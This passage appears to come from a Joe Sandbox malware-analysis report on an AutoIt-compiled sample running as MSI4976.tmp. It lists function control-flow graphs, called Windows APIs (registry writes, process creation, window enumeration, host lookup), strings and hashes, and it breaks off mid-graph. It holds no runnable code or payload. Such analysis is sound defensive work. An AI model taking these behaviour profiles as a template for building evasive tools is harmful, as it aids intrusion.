                                        control_flow_graph 608 321f04-321f9c call 322d1a * 2 call 32c935 * 2 call 327e53 call 32d3d2 * 3 625 392569-392575 call 342626 608->625 626 321fa2-321fa6 608->626 627 39257d-392583 call 35e4ea 625->627 626->627 628 321fac-321faf 626->628 631 39258f-39259b call 32a4f6 627->631 628->631 632 321fb5-321fb8 628->632 640 392899-39289d 631->640 641 3925a1-3925b1 call 32a4f6 631->641 632->631 634 321fbe-321fc7 GetForegroundWindow call 32200a 632->634 639 321fcc-321fe3 call 32197e 634->639 651 321fe4-322007 call 325cd3 * 3 639->651 643 3928ab-3928ae 640->643 644 39289f-3928a6 call 32c935 640->644 641->640 654 3925b7-3925c5 641->654 648 3928b0 643->648 649 3928b7-3928c4 643->649 644->643 648->649 652 3928d6-3928da 649->652 653 3928c6-3928d4 call 32b8a7 CharUpperBuffW 649->653 655 3928dc-3928df 652->655 656 3928f1-3928fa 652->656 653->652 659 3925c9-3925e1 call 35d68d 654->659 655->656 660 3928e1-3928ef call 32b8a7 CharUpperBuffW 655->660 661 39290b EnumWindows 656->661 662 3928fc-392909 GetDesktopWindow EnumChildWindows 656->662 659->640 670 3925e7-3925f7 call 33f885 659->670 660->656 667 392911-392930 call 35e44e call 322d1a 661->667 662->667 685 392940 667->685 686 392932-39293b call 32200a 667->686 680 39287b-39288b call 33f885 670->680 681 3925fd-39260d call 33f885 670->681 690 39288d-392891 680->690 691 392873-392876 680->691 692 392861-392871 call 33f885 681->692 693 392613-392623 call 33f885 681->693 686->685 690->651 694 392897 690->694 692->691 700 392842-392848 GetForegroundWindow 692->700 701 392629-392639 call 33f885 693->701 702 39281d-392836 call 3688a2 IsWindow 693->702 697 392852-392858 694->697 697->692 704 392849-392850 call 32200a 700->704 711 392659-392669 call 33f885 701->711 712 39263b-392640 701->712 702->651 709 39283c-392840 702->709 704->697 709->704 719 39266b-392675 711->719 720 39267a-39268a call 33f885 711->720 714 39280d-39280f 712->714 715 392646-392657 call 325cf6 712->715 716 392817-392818 714->716 722 39269b-3926a7 call 325be9 715->722 716->651 723 3927e6-3927f0 call 32c935 719->723 728 39268c-392698 call 325cf6 720->728 729 3926b5-3926c5 call 33f885 720->729 734 3926ad-3926b0 722->734 735 392811-392813 722->735 733 392804-392808 723->733 728->722 739 3926e3-3926f3 call 33f885 729->739 740 3926c7-3926de call 342241 729->740 733->659 734->733 735->716 745 392711-392721 call 33f885 739->745 746 3926f5-39270c call 342241 739->746 740->733 751 39273f-39274f call 33f885 745->751 752 392723-39273a call 342241 745->752 746->733 757 39276d-39277d call 33f885 751->757 758 392751-392768 call 342241 751->758 752->733 763 39277f-392793 call 342241 757->763 764 392795-3927a5 call 33f885 757->764 758->733 763->733 769 3927c3-3927d3 call 33f885 764->769 770 3927a7-3927b7 call 33f885 764->770 776 3927f2-392802 call 35d614 769->776 777 3927d5-3927da 769->777 770->691 775 3927bd-3927c1 770->775 775->733 776->691 776->733 778 3927dc-3927e2 777->778 779 392815 777->779 778->723 779->716
                                        APIs
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • GetForegroundWindow.USER32 ref: 00321FBE
                                        • IsWindow.USER32(?), ref: 0039282E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Foreground_memmove
                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                        • API String ID: 3828923867-1919597938
                                        • Opcode ID: 3032ccc6864eb6a7d1ce203b1388ea1ee6a1fabfd2e92d13c5fc1eb9f35c8570
                                        • Instruction ID: d48903000f2b8ced43eab9c0fcb9cd31b6e52cfeb1fa8dbadc3f89c060022704
                                        • Opcode Fuzzy Hash: 3032ccc6864eb6a7d1ce203b1388ea1ee6a1fabfd2e92d13c5fc1eb9f35c8570
                                        • Instruction Fuzzy Hash: 5DD1E830508B02FFCF0BEF20D480AABB7A5BF54344F544A29F4565B5A2DB30E959CB92
                                        Function 0038352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 782 38352a-383569 call 32d3d2 * 3 789 38356b-38356e 782->789 790 383574-3835e7 call 3284a6 call 383d7b call 383af7 782->790 789->790 791 3835f9-38360d call 332570 789->791 804 3835e9-3835f4 call 36d7e4 790->804 805 383612-383617 790->805 798 383a94-383ab7 call 325cd3 * 3 791->798 804->791 808 383619-38362e RegConnectRegistryW 805->808 809 38366d 805->809 812 383630-383662 call 327ba9 call 36d7e4 call 332570 808->812 813 383667-38366b 808->813 811 383671-38369c RegCreateKeyExW 809->811 815 38369e-3836d2 call 327ba9 call 36d7e4 call 332570 811->815 816 3836e7-3836ec 811->816 812->798 813->811 815->798 840 3836d8-3836e2 RegCloseKey 815->840 820 383a7b-383a8c RegCloseKey 816->820 821 3836f2-383715 call 3284a6 call 341bc7 816->821 820->798 824 383a8e-383a92 RegCloseKey 820->824 835 383796-3837b6 call 3284a6 call 341bc7 821->835 836 383717-38376d call 3284a6 call 3418fb call 3284a6 * 2 RegSetValueExW 821->836 824->798 847 3837bc-383814 call 3284a6 call 3418fb call 3284a6 * 2 RegSetValueExW 835->847 848 383840-383860 call 3284a6 call 341bc7 835->848 836->820 861 383773-383791 call 327ba9 call 332570 836->861 840->798 847->820 881 38381a-38383b call 327ba9 call 332570 847->881 862 383949-383969 call 3284a6 call 341bc7 848->862 863 383866-3838c9 call 3284a6 call 34010a call 3284a6 call 323b1e 848->863 878 383a74 861->878 883 38396b-38398b call 32cdb4 call 3284a6 862->883 884 3839c6-3839e6 call 3284a6 call 341bc7 862->884 898 3838e9-383918 call 3284a6 RegSetValueExW 863->898 899 3838cb-3838d0 863->899 878->820 881->820 907 38398d-3839a1 RegSetValueExW 883->907 904 3839e8-383a0e call 32d00b call 3284a6 884->904 905 383a13-383a30 call 3284a6 call 341bc7 884->905 915 38391a-383936 call 327ba9 call 332570 898->915 916 38393d-383944 call 34017e 898->916 902 3838d8-3838db 899->902 903 3838d2-3838d4 899->903 902->899 908 3838dd-3838df 902->908 903->902 904->907 929 383a32-383a60 call 36be47 call 3284a6 call 36be8a 905->929 930 383a67-383a71 call 332570 905->930 907->820 912 3839a7-3839c1 call 327ba9 call 332570 907->912 908->898 913 3838e1-3838e5 908->913 912->878 913->898 915->916 916->820 929->930 930->878
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00383626
                                        • RegCreateKeyExW.KERNEL32(?,?,00000000,003BDBF0,00000000,?,00000000,?,?), ref: 00383694
                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003836DC
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00383765
                                        • RegCloseKey.ADVAPI32(?), ref: 00383A85
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00383A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Close$ConnectCreateRegistryValue
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 536824911-966354055
                                        • Opcode ID: d420f7a519b81139b855738e2c43813ecbbeddd885ad9d0c9b8387e8d1c4c2da
                                        • Instruction ID: 853f4d146d5fb86994823819cecd83cfaabc5e8e371eae40e0fa1014dc52ef68
                                        • Opcode Fuzzy Hash: d420f7a519b81139b855738e2c43813ecbbeddd885ad9d0c9b8387e8d1c4c2da
                                        • Instruction Fuzzy Hash: 5B0248752006119FCB16EF29D891E6AB7E9FF89720F05845DF88A9B362DB34ED01CB41
                                        Function 0033E975 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 170COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0033EA39
                                        • __wsplitpath.LIBCMT ref: 0033EA56
                                          • Part of subcall function 0034297D: __wsplitpath_helper.LIBCMT ref: 003429BD
                                        • _wcsncat.LIBCMT ref: 0033EA69
                                        • __makepath.LIBCMT ref: 0033EA85
                                          • Part of subcall function 00342BFF: __wmakepath_s.LIBCMT ref: 00342C13
                                          • Part of subcall function 0034010A: std::exception::exception.LIBCMT ref: 0034013E
                                          • Part of subcall function 0034010A: __CxxThrowException@8.LIBCMT ref: 00340153
                                        • _wcscpy.LIBCMT ref: 0033EABE
                                          • Part of subcall function 0033EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0033EADA,?,?), ref: 0033EB27
                                        • _wcscat.LIBCMT ref: 003932FC
                                        • _wcscat.LIBCMT ref: 00393334
                                        • _wcsncpy.LIBCMT ref: 00393370
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                        • String ID: '/6$Include$\$">
                                        • API String ID: 1213536620-634662058
                                        • Opcode ID: de659a071c4c113b5a2d8d4e56e7c1877e81afb2f101c32491b48f095db8f20b
                                        • Instruction ID: 0b1585c8b297544de818831a5727f4a24f152fa98d03352ce86c4fd3e7f73e87
                                        • Opcode Fuzzy Hash: de659a071c4c113b5a2d8d4e56e7c1877e81afb2f101c32491b48f095db8f20b
                                        • Instruction Fuzzy Hash: 0951E9BA4043809BC727EF55E8C589BB7ECFB49300F404A1EF5459B2A1EB74A644CF66
                                        Function 00324257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI4976.tmp,00000104,?,00000000,00000001,00000000), ref: 0032428C
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 00341BC7: __wcsicmp_l.LIBCMT ref: 00341C50
                                        • _wcscpy.LIBCMT ref: 003243C0
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI4976.tmp,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0039214E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Windows\Installer\MSI4976.tmp$CMDLINE$CMDLINERAW
                                        • API String ID: 861526374-1219366996
                                        • Opcode ID: 4aaedad4b522fe36ad3273a3993afdb47dc77a7e160940dda307b584e9ce3834
                                        • Instruction ID: 3c608fac454ddb689be5f640689a39412dffda541a1a34a04a9e3ea5b36ebdb7
                                        • Opcode Fuzzy Hash: 4aaedad4b522fe36ad3273a3993afdb47dc77a7e160940dda307b584e9ce3834
                                        • Instruction Fuzzy Hash: C5817376900529AACB17EBE1ED92EEFB7BCAF15350F500115F541BB081EB706B44CBA1
                                        Function 003678EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1143 3678ee-367911 WSAStartup 1144 367917-367938 gethostname gethostbyname 1143->1144 1145 3679b1-3679bd call 341943 1143->1145 1144->1145 1146 36793a-367941 1144->1146 1154 3679be-3679c1 1145->1154 1148 367943 1146->1148 1149 36794e-367950 1146->1149 1151 367945-36794c 1148->1151 1152 367952-36795f call 341943 1149->1152 1153 367961-3679a6 call 33faa0 inet_ntoa call 343220 call 368553 call 341943 call 34017e 1149->1153 1151->1149 1151->1151 1160 3679a9-3679af WSACleanup 1152->1160 1153->1160 1160->1154
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 208665112-3771769585
                                        • Opcode ID: eaddce9a6a87340e1a35a068f91492d6fd9acd62a709c882c35e3d1ef0f0a070
                                        • Instruction ID: e10960462a1b9f4c7d359b78c5bb4735b7a09de22690f58684e75e372952d018
                                        • Opcode Fuzzy Hash: eaddce9a6a87340e1a35a068f91492d6fd9acd62a709c882c35e3d1ef0f0a070
                                        • Instruction Fuzzy Hash: BF112431908115AFDB27AB70DC4AEEA73FCDF06724F4040A5F0069A094EF70DA808BA0
                                        Function 003230A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 003230B0
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 003230BF
                                        • LoadIconW.USER32(00000063), ref: 003230D5
                                        • LoadIconW.USER32(000000A4), ref: 003230E7
                                        • LoadIconW.USER32(000000A2), ref: 003230F9
                                          • Part of subcall function 0032318A: LoadImageW.USER32(00320000,00000063,00000001,00000010,00000010,00000000), ref: 003231AE
                                        • RegisterClassExW.USER32(?), ref: 00323167
                                          • Part of subcall function 00322F58: GetSysColorBrush.USER32(0000000F), ref: 00322F8B
                                          • Part of subcall function 00322F58: RegisterClassExW.USER32(00000030), ref: 00322FB5
                                          • Part of subcall function 00322F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00322FC6
                                          • Part of subcall function 00322F58: LoadIconW.USER32(000000A9), ref: 00323009
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 2880975755-4155596026
                                        • Opcode ID: 278c6081dbc08d743a4342056a6bd59ceaf4eaaec31ddaeb30b31580ee0eb12c
                                        • Instruction ID: d8d7584951133bbf913a3c93a706de5e9e2ab0be0f3c23ee49ec0bb361d51dd7
                                        • Opcode Fuzzy Hash: 278c6081dbc08d743a4342056a6bd59ceaf4eaaec31ddaeb30b31580ee0eb12c
                                        • Instruction Fuzzy Hash: A2214474E00354AFDB56DFA9EC85A9EBFF9FB48314F00422AE614AB2E0D77545408F91
                                        Function 0037B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1342 37b74b-37b7ac VariantInit call 32ca8e CoInitialize 1345 37b7b4-37b7c7 call 33d5f6 1342->1345 1346 37b7ae CoUninitialize 1342->1346 1349 37b7d5-37b7dc 1345->1349 1350 37b7c9-37b7d0 call 32ca8e 1345->1350 1346->1345 1352 37b7de-37b805 call 3284a6 call 35a857 1349->1352 1353 37b81b-37b85b call 3284a6 call 33f885 1349->1353 1350->1349 1352->1353 1364 37b807-37b816 call 37c235 1352->1364 1362 37b9d3-37ba17 SetErrorMode CoGetInstanceFromFile 1353->1362 1363 37b861-37b86e 1353->1363 1367 37ba1f-37ba3a CoGetObject 1362->1367 1368 37ba19-37ba1d 1362->1368 1365 37b870-37b881 call 33d5f6 1363->1365 1366 37b8a8-37b8b6 GetRunningObjectTable 1363->1366 1377 37bad0-37bae3 VariantClear 1364->1377 1386 37b883-37b88d call 32cdb4 1365->1386 1387 37b8a0 1365->1387 1371 37b8d5-37b8e8 call 37c235 1366->1371 1372 37b8b8-37b8c9 1366->1372 1375 37bab5-37bac5 call 37c235 SetErrorMode 1367->1375 1376 37ba3c 1367->1376 1374 37ba40-37ba47 SetErrorMode 1368->1374 1389 37bac7-37bacb call 325cd3 1371->1389 1392 37b8ed-37b8fc 1372->1392 1393 37b8cb-37b8d0 1372->1393 1381 37ba4b-37ba51 1374->1381 1375->1389 1376->1374 1382 37ba53-37ba55 1381->1382 1383 37baa8-37baab 1381->1383 1390 37ba57-37ba78 call 35ac4b 1382->1390 1391 37ba8d-37baa6 call 36a6f6 1382->1391 1383->1375 1386->1387 1402 37b88f-37b89e call 32cdb4 1386->1402 1387->1366 1389->1377 1390->1391 1403 37ba7a-37ba83 1390->1403 1391->1389 1401 37b907-37b91b 1392->1401 1393->1371 1408 37b921-37b925 1401->1408 1409 37b9bb-37b9d1 1401->1409 1402->1366 1403->1391 1408->1409 1410 37b92b-37b940 1408->1410 1409->1381 1413 37b9a2-37b9ac 1410->1413 1414 37b942-37b957 1410->1414 1413->1401 1414->1413 1418 37b959-37b983 call 35ac4b 1414->1418 1422 37b985-37b98d 1418->1422 1423 37b994-37b99e 1418->1423 1424 37b9b1-37b9b6 1422->1424 1425 37b98f-37b990 1422->1425 1423->1413 1424->1409 1425->1423
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 0037B777
                                        • CoInitialize.OLE32(00000000), ref: 0037B7A4
                                        • CoUninitialize.COMBASE ref: 0037B7AE
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0037B8AE
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 0037B9DB
                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0037BA0F
                                        • CoGetObject.OLE32(?,00000000,003AD91C,?), ref: 0037BA32
                                        • SetErrorMode.KERNEL32(00000000), ref: 0037BA45
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0037BAC5
                                        • VariantClear.OLEAUT32(003AD91C), ref: 0037BAD5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                        • String ID:
                                        • API String ID: 2395222682-0
                                        • Opcode ID: c4a6527459041fad65c014009f15c4ca134a45b71cc6c7ceae8b2553abb25dd7
                                        • Instruction ID: 0609cd7313e929aa502e2de229be265c7f578751f33c962fc861d490f798bf70
                                        • Opcode Fuzzy Hash: c4a6527459041fad65c014009f15c4ca134a45b71cc6c7ceae8b2553abb25dd7
                                        • Instruction Fuzzy Hash: CEC12371604345AFC711EF68C884A6BB7E9FF89304F00891DF98A9B251DB75ED05CB52
                                        Function 00322F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00322F8B
                                        • RegisterClassExW.USER32(00000030), ref: 00322FB5
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00322FC6
                                        • LoadIconW.USER32(000000A9), ref: 00323009
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 975902462-1005189915
                                        • Opcode ID: f567803a90d043ec7db9f35dd125873813079c8b59ab1e056caee9ae003655fa
                                        • Instruction ID: 129212f95808e228b57ebe4b435496ec307186029eac756d18747569c8af1020
                                        • Opcode Fuzzy Hash: f567803a90d043ec7db9f35dd125873813079c8b59ab1e056caee9ae003655fa
                                        • Instruction Fuzzy Hash: E621C4B5900358AFDB12DFA4E889BCEBBF8FB09704F00421AF615AA6A0D7B14544CF91
                                        Function 003823C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1431 3823c5-382426 call 341970 1434 382428-38243b call 32cdb4 1431->1434 1435 382452-382456 1431->1435 1446 382488 1434->1446 1447 38243d-382450 call 32cdb4 1434->1447 1436 382458-382468 call 32cdb4 1435->1436 1437 38249d-3824a3 1435->1437 1450 38246b-382484 call 32cdb4 1436->1450 1441 3824b8-3824be 1437->1441 1442 3824a5-3824a8 1437->1442 1443 3824c8-3824e2 call 3284a6 call 323bcf 1441->1443 1444 3824c0 1441->1444 1448 3824ab-3824b0 call 32cdb4 1442->1448 1464 3824e8-382541 call 3284a6 call 323bcf call 3284a6 call 323bcf call 3284a6 call 323bcf 1443->1464 1465 3825a1-3825a9 1443->1465 1444->1443 1451 38248b-38248f 1446->1451 1447->1450 1448->1441 1450->1437 1463 382486 1450->1463 1457 382499-38249b 1451->1457 1458 382491-382497 1451->1458 1457->1437 1457->1441 1458->1448 1463->1451 1511 38256f-38259f GetSystemDirectoryW call 34010a GetSystemDirectoryW 1464->1511 1512 382543-38255e call 3284a6 call 323bcf 1464->1512 1466 3825ab-3825c6 call 3284a6 call 323bcf 1465->1466 1467 3825d3-382601 GetCurrentDirectoryW call 34010a GetCurrentDirectoryW 1465->1467 1466->1467 1481 3825c8-3825d1 call 3418fb 1466->1481 1476 382605 1467->1476 1479 382609-38260d 1476->1479 1482 38263e-38264e call 369a8f 1479->1482 1483 38260f-382639 call 32ca8e * 3 1479->1483 1481->1467 1481->1482 1495 3826aa 1482->1495 1496 382650-38269b call 36a17a call 36a073 call 36a102 1482->1496 1483->1482 1497 3826ac-3826bb 1495->1497 1496->1497 1529 38269d-3826a8 1496->1529 1501 38274c-382768 CreateProcessW 1497->1501 1502 3826c1-3826f1 call 35bc90 call 3418fb 1497->1502 1508 38276b-38277e call 34017e * 2 1501->1508 1525 3826fa-38270a call 3418fb 1502->1525 1526 3826f3-3826f8 1502->1526 1532 3827bd-3827c9 CloseHandle 1508->1532 1533 382780-3827b8 call 36d7e4 GetLastError call 327ba9 call 332570 1508->1533 1511->1476 1512->1511 1537 382560-382569 call 3418fb 1512->1537 1540 38270c-382711 1525->1540 1541 382713-382723 call 3418fb 1525->1541 1526->1525 1526->1526 1529->1497 1534 3827cb-3827f0 call 369d09 call 36a37f call 382881 1532->1534 1535 3827f5-3827f9 1532->1535 1548 38283e-38284f call 369b29 1533->1548 1534->1535 1542 3827fb-382805 1535->1542 1543 382807-382811 1535->1543 